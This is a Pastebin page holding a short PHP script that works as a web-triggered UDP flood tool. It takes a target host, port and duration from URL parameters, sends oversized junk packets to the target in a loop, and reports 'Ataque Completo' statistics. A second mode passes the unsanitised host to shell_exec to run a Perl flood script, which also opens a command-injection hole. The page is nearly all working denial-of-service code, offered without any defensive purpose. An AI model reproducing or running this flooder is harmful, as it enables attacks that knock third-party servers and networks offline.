Advertisement
Guest User

RevoltsViado

a guest
Oct 1st, 2016
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.99 KB | None | 0 0
  1. <?php
  2. $packets = 0;
  3. $ip = $_GET['host'];
  4. $rand = $_GET['port'];
  5. set_time_limit(0);
  6. ignore_user_abort(FALSE);
  7.  
  8. $exec_time = $_GET['time'];
  9. if ($_GET['mode'] == "udp"){
  10. $time = time();
  11. print "Ataque: $ip on port $rand <br><br>";
  12. $max_time = $time+$exec_time;
  13.  
  14. if ($ip == null)
  15. {
  16.  
  17. echo "Enter a host";
  18.  
  19. }
  20.  
  21. for($i=0;$i<65535;$i++){
  22. $out .= "X";
  23. }
  24. while(1){
  25. $packets++;
  26. if(time() > $max_time){
  27. break;
  28. }
  29.  
  30. $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  31. if($fp){
  32. fwrite($fp, $out);
  33. fclose($fp);
  34. }
  35. }
  36. echo "Ataque Completo ".time('h:i:s')." com $packets (" . round(($packets*65)/1024, 2) . " mB) pacotes em média ". round($packets/$exec_time, 2) . " packets por/segundo \n";
  37. } else if ( $_GET['mode'] == "perl") {
  38. if ($ip == null)
  39. {
  40.  
  41. echo "Enter a host";
  42.  
  43. }
  44. else{
  45. shell_exec("perl /var/www/html/udp.pl $ip $port 65500 $time");
  46.  
  47. echo "Attack Done";
  48. }
  49. }
  50. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement